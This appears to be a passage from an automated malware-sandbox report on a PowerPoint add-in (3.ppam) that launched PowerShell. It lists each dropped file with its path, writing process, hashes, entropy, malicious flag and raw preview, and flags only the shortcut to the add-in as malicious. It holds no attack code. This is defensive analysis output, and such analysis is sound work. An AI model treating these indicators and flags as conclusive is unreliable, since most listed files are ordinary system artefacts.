                                                                                                                                                                      Entropy (8bit):5.356496584509331
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-01-14T11:19:27">.. Build: 16.0.14830.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):57895
                                                                                                                                                                      Entropy (8bit):5.076836667322206
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: PSMODULECACHE.X....Kf8...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet........yH.8...I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEach........Should........BeforeEach........Get-MockDynamicParameters........It........Assert-VerifiableMocks........BeforeAll........Context........Set-TestInconclusive........AfterAll........Setup........Set-DynamicParameterVariables........Invoke-Pester........Assert-MockCalled........New-PesterOption.........P.e...N...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository.......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):0.9260988789684415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: @...e................................................@..........
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):152056
                                                                                                                                                                      Entropy (8bit):4.414483777350781
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:fmmMLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:fyg8WpFpKKHHedydFeo+oQLUlPow
                                                                                                                                                                      MD5:C38DBDB68E1687396E570A305461E96F
                                                                                                                                                                      SHA1:1D2491FD377C4338E9FE70853FBCD7F9C7BAC60D
                                                                                                                                                                      SHA-256:7D1AA51D101EC19951EA7E263928B530E89C11A468BC024FABBC2285A5EC672A
                                                                                                                                                                      SHA-512:4F6930507357BB2A27DE2D3A2B9ECD94F40A07BEBE1EA40A5268A6F0C8FFF8C1B373CD52ED3BA43CF0437E39F7A1FC4E6A1C2BCF4D422CFD5FF0883766E8C835
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aslmsvnf.ger.psm1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdnca5x3.uvv.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jde4l4rg.xur.ps1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5ax1rj2.edq.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toqs3qr1.2zp.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txdgbers.q4d.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucm40ytk.tsg.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzzf3cwh.xmg.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1369462A1EE99835.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                      Entropy (8bit):1.081249345282127
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:WImD2929jAfxHh8yQiZSV53HDGyEdaSdE4PS2BpLIJIkAaf:WImB8Hh8yQ8SVN63daSuwIJIkZ
                                                                                                                                                                      MD5:5EE1BAE24EEFA9B3B61DA8815E53E4B7
                                                                                                                                                                      SHA1:A22177BD3176995CCFB2F6531FED73F1DDC4DB52
                                                                                                                                                                      SHA-256:35AFF1285BFAB2AE04EB496B2D8445518BE0EC849EC1FB401D7950E7D2DF1397
                                                                                                                                                                      SHA-512:BC36D1E1FD57340ED29BAB553A9D09753C455C381C1DB2C3A4475EED976C78BFD0D1167B9392474281BF80869ADD48AAAA0EBC8241C6273E11D9CCE22B1D44FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF85570804A0D29ED2.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):30720
                                                                                                                                                                      Entropy (8bit):3.8910597598818932
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:S7afmLYweRiyE4PS2BpknByEdaSaHh8yQiZSV53HDajAfJe9ao+K:lOleRiHX3daSaHh8yQ8SVNeMfK
                                                                                                                                                                      MD5:4F690132943014844147FAB0ED1FE742
                                                                                                                                                                      SHA1:1C6EDD69084960CBA057F758C1BBC2B28B1CF015
                                                                                                                                                                      SHA-256:D400F28E0173699EC66699E19D74986B4802B49387ED4BB882D880B7C9F2DF6F
                                                                                                                                                                      SHA-512:81AF2B5C2E573F3AD8B263B00B296538A4A1DDFB2B82C028704CF14DC7ADA64DD1393FD5925D776B3A10194A3737457362857942E555649AFE7C62D237B57116
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9BC36A1CA590193F.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1536
                                                                                                                                                                      Entropy (8bit):1.1464700112623651
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                      MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                                      SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                                      SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                                      SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9DBD3B75C3E39F13.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFAD037A81745781F0.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):61440
                                                                                                                                                                      Entropy (8bit):0.18599931891672755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2tytja2D7VRFeRLUMS8VfXAU05MAA1lQ/f8EfrCfeaf:2oc2D7DFeRLUGVQnYuf3frCfeaf
                                                                                                                                                                      MD5:3A49E7325E29A24E5D94558792089185
                                                                                                                                                                      SHA1:5CE0F8D7AC8156F8C85B473F94F1B10A0C0F627C
                                                                                                                                                                      SHA-256:7A87C7600A6A08AA03F0F6827C4C4B144CB1F452D121DF80ADCCCA450F2C48BF
                                                                                                                                                                      SHA-512:008A0D75E5B82C5A3FBB942F2DD00692115B3F59F9FC51237D6099630A07997390369F763C1FD2DB4C8E9A222F95D220B3BB939DC0B9C482D90881BDD53357F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Forms\POWERPNT.box
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7168
                                                                                                                                                                      Entropy (8bit):2.4399943770003842
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:rCBwTIfOt4hfcFjO1tTbfcddbf8sD7VRFeRLUMS8VfXAU05MAA1lQ:FTIfOyhfci1bfcPf/D7DFeRLUGVQnY
                                                                                                                                                                      MD5:2BD39DA18ED09D40B478D6118A4ACAF2
                                                                                                                                                                      SHA1:405D796F892395B75C0C186E1328C035D95A4CD9
                                                                                                                                                                      SHA-256:B0B6DBF4AEC184E46B38A8ADF90811E1AA2018A07DBB18145B6BCF10DE80FE05
                                                                                                                                                                      SHA-512:E74CF6C58D5FAEA25B9B5E5824E82756CBC721B95DFAD126811ED0CCA6D85CFFF09E501165123F6C98AB01BDA81744AB8A3E272B7B341A2EB7EC00FB46286709
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3.ppam.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 23 14:11:42 2021, mtime=Fri Jan 14 19:19:42 2022, atime=Fri Jan 14 19:19:24 2022, length=12137, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1013
                                                                                                                                                                      Entropy (8bit):4.67110438699213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8KrzFRUAuElPCH20mMn4q8+W2lSuRZkjAm/w4IroD+vGb5vGl4t2Y+xIBjKZm:8K+mMZnlPRKAmI4zDrbkX7aB6m
                                                                                                                                                                      MD5:2897C03627035D8CBC52A2C0F24B9265
                                                                                                                                                                      SHA1:C3D9DBF969ACBFECDFA40CC1902D4D57A1597840
                                                                                                                                                                      SHA-256:5F1DA4ECB8C7D741C4B8263ADE13D80369A9CAAD14A119063C809CDD3BD97E40
                                                                                                                                                                      SHA-512:8F2995FB700174AE6EBDDB417C1C64096DDE869014D50F95374A90DCB99569F080ECA8DAC3DD4B75CCD4CA63D6EC858F7479F6CA41D02F5EEABF616182A1EE49
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: L..................F.... ......P...................i/...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tf.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Swy..user.<.......Ny..Tf......S........................h.a.r.d.z.....~.1.....7S{y..Desktop.h.......Ny..Tf......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.i/...Tm. .359D9~1.PPA.>......7Svy.Tm.....h.....................v~..3...p.p.a.m.......L...............-.......K...........>.S......C:\Users\user\Desktop\3.ppam........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3...p.p.a.m.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sF
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):4.430036532577266
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:bDuMJlaLBCmxWLLBCv:bCjLBsLBs
                                                                                                                                                                      MD5:2268D2C93E8D54B943A1825B500A876C
                                                                                                                                                                      SHA1:64F3A9A7B36D6061859734917CC24198D9557EF6
                                                                                                                                                                      SHA-256:CE4CDEDF18D3FD89461227E4DB3F1CAF43BBF132C743A57E53C5F1D579B6E2C8
                                                                                                                                                                      SHA-512:287D5860D57900E92932EF9F62CCFF86B0FEC70DF1C44AE4A2027F3A173C68E565083E165FE50E2EA698558B42966CFD84177A557F681CDDC615E7FB0A338346
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: [folders]..Templates.LNK=0..3.ppam.LNK=0..[misc]..3.ppam.LNK=0..
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2IDCQDM3N311XDK6HX9H.temp
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7520935693598654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:In8FoCCh51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:rFid6jS2
                                                                                                                                                                      MD5:376A424FAC6B80B4D92D8CE42E6DCEF8
                                                                                                                                                                      SHA1:0747D08FE4257BAB3429B857DC772CAC6A07C3B5
                                                                                                                                                                      SHA-256:456D9460332473F36E7ABF0112154FD46C637C40E68EC0B47A48F0B0B3053A40
                                                                                                                                                                      SHA-512:C04C94428F7396F78011C438D4D07C7A844963E6E59AB159BD117AFD6F0243E5B6DAF332C4194732F937AAE11B9C543BB5D2B525C3F54F4896644E3DC301A5D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.....z.:........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..T.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7520935693598654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:In8FoCCh51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:rFid6jS2
                                                                                                                                                                      MD5:376A424FAC6B80B4D92D8CE42E6DCEF8
                                                                                                                                                                      SHA1:0747D08FE4257BAB3429B857DC772CAC6A07C3B5
                                                                                                                                                                      SHA-256:456D9460332473F36E7ABF0112154FD46C637C40E68EC0B47A48F0B0B3053A40
                                                                                                                                                                      SHA-512:C04C94428F7396F78011C438D4D07C7A844963E6E59AB159BD117AFD6F0243E5B6DAF332C4194732F937AAE11B9C543BB5D2B525C3F54F4896644E3DC301A5D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.....z.:........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..T.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H9YDYMUH59Q25R60FLIG.temp
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7525966087668103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:InrXFoCCZ51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:aXFil6jS2
                                                                                                                                                                      MD5:75BD9F0789276F7D2087AA9C34FD76E6
                                                                                                                                                                      SHA1:A23E5B2F2351510D042E3D97E8CB1AC596B4BD06
                                                                                                                                                                      SHA-256:03E0096DB6817714AF02502726E83DE2A95825B7FBE390FE322D9354A00E052B
                                                                                                                                                                      SHA-512:6E9F322972BC0DBEF244F1438D2F0621DF778C644B268F44E99D8B2166A66796D76D2A4BC3992793146B0886BE82A0C8F4F05A8022A7890C0FA11A6D0586A286
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.......5........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.7S.x.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\Desktop\~$3.ppam
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):165
                                                                                                                                                                      Entropy (8bit):1.6126637592865871
